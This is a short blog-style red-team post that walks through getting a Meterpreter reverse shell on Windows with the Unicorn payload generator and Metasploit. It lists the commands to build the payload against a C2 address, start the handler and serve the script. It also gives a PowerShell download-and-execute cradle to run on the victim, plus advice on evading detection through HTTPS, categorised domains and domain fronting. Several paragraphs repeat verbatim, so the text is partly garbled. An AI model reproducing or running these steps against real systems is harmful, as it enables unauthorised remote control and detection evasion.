Payloads with Unicorn
Want to document some of my redteam experiences. How I got a shell recently.
then, run
msfconsole -r unicorn.rc
Does the magic, then your reverse handler should be created, at http://0.0.0.0:443
Now, serve the payload, again take care on how you are serving (use tls/ssl)
Then run the following on the Windows machine.
powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://0.0.0.0:4443/dd.ps1‘)"
Note: Do not use http for payload serving, this can be easily picked up. Also use a HTTPs reverse shell payload.
I will post how this can be achieved later.
basically download the latest version of unicorn from here :
cd unicorn
python unicorn.py windows/meterpreter/reverse_http [c2ip] 443
The above command will create two files.
"powershell_attack.txt" and "unicorn.rc"
then, run
msfconsole -r unicorn.rc
Does the magic, then your reverse handler should be created, at http://0.0.0.0:443
At this point you may want to navigate to the above site and verify if the connection is working. Note: care needs to be taken to ensure you don't reveal the http site, use https where you can, and also use categorised domains, domain fronting etc. Pick your setup as per the business case.
Now, serve the payload, again take care on how you are serving (use tls/ssl)
sudo python -m SimpleHTTPServer 4443
Then run the following on the Windows machine.
powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://0.0.0.0:4443/dd.ps1‘)"
Note: Do not use http for payload serving, this can be easily picked up. Also use a HTTPs reverse shell payload.
I will post how this can be achieved later.
Comments